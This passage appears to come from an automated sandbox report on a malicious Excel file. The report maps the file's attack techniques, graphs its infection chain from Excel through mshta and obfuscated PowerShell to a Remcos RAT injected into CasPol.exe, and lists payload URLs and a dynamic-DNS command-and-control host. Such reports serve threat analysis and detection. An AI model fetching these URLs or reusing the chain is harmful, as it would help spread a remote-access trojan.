                    CredentialsDomainsDefault Accounts23
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		21
                    Obfuscated Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Email Collection                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts131
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		1
                    Install Root Certificate                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares211
                    Input Capture                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		1
                    DLL Side-Loading                    		NTDS3
                    File and Directory Discovery                    		Distributed Component Object Model4
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts4
                    PowerShell                    		Network Logon Script222
                    Process Injection                    		1
                    Bypass User Account Control                    		LSA Secrets35
                    System Information Discovery                    		SSHKeylogging213
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials3
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion                    		DCSync21
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc Filesystem3
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1559540 Sample: pi-77159.xls Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 104 Suricata IDS alerts for network traffic 2->104 106 Found malware configuration 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 25 other signatures 2->110 11 EXCEL.EXE 57 53 2->11         started        process3 dnsIp4 90 192.3.220.29, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->90 92 provit.uk 198.244.140.41, 443, 49163, 49165 RIDLEYSD-NETUS United States 11->92 72 C:\Users\user\Desktop\pi-77159.xls (copy), Composite 11->72 dropped 74 C:\Users\user\...\~DFC4030D08E8153FBD.TMP, Composite 11->74 dropped 76 seethebestthignswh...pportunities[1].hta, HTML 11->76 dropped 124 Microsoft Office drops suspicious files 11->124 16 mshta.exe 10 11->16         started        20 mshta.exe 11->20         started        22 AcroRd32.exe 21 11->22         started        file5 signatures6 process7 dnsIp8 80 provit.uk 16->80 100 Suspicious powershell command line found 16->100 102 PowerShell case anomaly found 16->102 24 powershell.exe 23 16->24         started        82 provit.uk 20->82 28 powershell.exe 20->28         started        signatures9 process10 file11 68 seehavingfacingbes...thentiretimegre.vbS, Unicode 24->68 dropped 70 C:\Users\user\AppData\...\qvgum1lr.cmdline, Unicode 24->70 dropped 116 Suspicious powershell command line found 24->116 118 Obfuscated command line found 24->118 30 wscript.exe 1 24->30         started        33 powershell.exe 4 24->33         started        35 csc.exe 2 24->35         started        38 wscript.exe 28->38         started        40 csc.exe 28->40         started        42 powershell.exe 28->42         started        signatures12 process13 file14 136 Suspicious powershell command line found 30->136 138 Wscript starts Powershell (via cmd or directly) 30->138 140 Bypasses PowerShell execution policy 30->140 144 2 other signatures 30->144 44 powershell.exe 2 30->44         started        142 Installs new ROOT certificates 33->142 66 C:\Users\user\AppData\Local\...\qvgum1lr.dll, PE32 35->66 dropped 47 cvtres.exe 35->47         started        49 powershell.exe 38->49         started        51 cvtres.exe 40->51         started        signatures15 process16 signatures17 120 Suspicious powershell command line found 44->120 122 Obfuscated command line found 44->122 53 powershell.exe 44->53         started        57 powershell.exe 49->57         started        process18 dnsIp19 84 ip.1017.filemail.com 142.215.209.78, 443, 49168, 49174 HUMBER-COLLEGECA Canada 53->84 86 1017.filemail.com 53->86 112 Writes to foreign memory regions 53->112 114 Injects a PE file into a foreign processes 53->114 59 CasPol.exe 53->59         started        88 1017.filemail.com 57->88 64 CasPol.exe 57->64         started        signatures20 process21 dnsIp22 94 banaya.duckdns.org 59->94 96 banaya.duckdns.org 192.3.101.149, 49176, 6946 AS-COLOCROSSINGUS United States 59->96 98 geoplugin.net 178.237.33.50, 49177, 80 ATOM86-ASATOM86NL Netherlands 59->98 78 C:\ProgramData\remcos\logs.dat, data 59->78 dropped 126 Contains functionality to bypass UAC (CMSTPLUA) 59->126 128 Detected Remcos RAT 59->128 130 Contains functionalty to change the wallpaper 59->130 134 5 other signatures 59->134 file23 132 Uses dynamic DNS services 94->132 signatures24

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    pi-77159.xls26%ReversingLabsWin32.Exploit.CVE-2017-0199
                    pi-77159.xls100%AviraTR/AVI.Agent.xoswb
                    pi-77159.xls100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\~DFC4030D08E8153FBD.TMP100%AviraTR/AVI.Agent.xoswb

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace~0%Avira URL Cloudsafe
                    https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace0%Avira URL Cloudsafe
                    https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyX0%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan00%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaC:0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC(0%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace40%Avira URL Cloudsafe
                    https://provit.uk/0%Avira URL Cloudsafe
                    http://schemas.dorg/wbem/wsman/1/wsm0%Avira URL Cloudsafe
                    https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu40%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htahttp://192.3.220.29/45/ww/0%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...0%Avira URL Cloudsafe
                    http://192.3.220.29/45/HDRDDG.txt0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehaving0%Avira URL Cloudsafe
                    https://www.html-code-generator.com0%Avira URL Cloudsafe
                    https://provit.uk/VQ0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta0%Avira URL Cloudsafe
                    https://provit.uk/00%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&laceg0%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace0%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...K0%Avira URL Cloudsafe
                    http://192.3.220.29/0%Avira URL Cloudsafe
                    banaya.duckdns.org0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFp0%Avira URL Cloudsafe
                    https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacew0%Avira URL Cloudsafe
                    http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:0%Avira URL Cloudsafe
                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan0%Avira URL Cloudsafe
                    https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacek0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    provit.uk
                    		198.244.140.41
                    		truefalse
                      		high
                      banaya.duckdns.org
                      		192.3.101.149
                      		truetrue
                        		unknown
                        geoplugin.net
                        		178.237.33.50
                        		truefalse
                          		high
                          ip.1017.filemail.com
                          		142.215.209.78
                          		truefalse
                            		high
                            1017.filemail.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://192.3.220.29/45/HDRDDG.txttrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htatrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                                		high
                                http://geoplugin.net/json.gpfalse
                                  		high
                                  banaya.duckdns.orgtrue
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC(powershell.exe, 00000006.00000002.490776775.000000001A746000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace4mshta.exe, 00000004.00000003.453814399.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.00000000003E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&laceyXmshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan0mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ocsp.entrust.net03mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaC:mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://provit.uk/mshta.exe, 00000004.00000003.454576074.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453814399.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455061023.0000000003E70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.000000000042F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.dorg/wbem/wsman/1/wsmwscript.exe, 0000001A.00000003.532582558.000000000016D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.534630974.000000000016E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://1017.filemail.compowershell.exe, 00000011.00000002.548845698.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace~mshta.exe, 00000012.00000002.524670515.00000000000EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4powershell.exe, 0000001E.00000002.585706991.00000000000AF000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://go.microspowershell.exe, 00000006.00000002.480662155.00000000034EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.0000000002497000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htahttp://192.3.220.29/45/ww/mshta.exe, 00000004.00000003.454723183.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.521827851.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524091180.0000000002A25000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://geoplugin.net/json.gp/CCasPol.exe, 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.000000000015D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://contoso.com/powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://provit.uk/VQmshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.480662155.0000000002131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.548845698.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.html-code-generator.commshta.exe, 00000004.00000003.454427910.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454213211.0000000003B70000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453457562.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455362300.0000000004C7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455101955.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453550721.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454198100.0000000004940000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455678281.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005BE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454567306.0000000003F2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454219108.0000000003820000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453622443.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454375370.0000000003F2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454320143.0000000005CB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005C78000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453653166.0000000005B11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453476331.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454228756.0000000005800000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454264813.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.453637390.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455663242.0000000005C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://192.3.220.29/45/seehavingpowershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Iconpowershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lacegmshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://provit.uk/0mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lacemshta.exe, 00000012.00000003.522772525.00000000000EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...Kmshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://192.3.220.29/mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.0000000003A11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFppowershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacewmshta.exe, 00000012.00000002.524670515.00000000000CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:powershell.exe, 00000014.00000002.537521208.000000001ACD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chanmshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
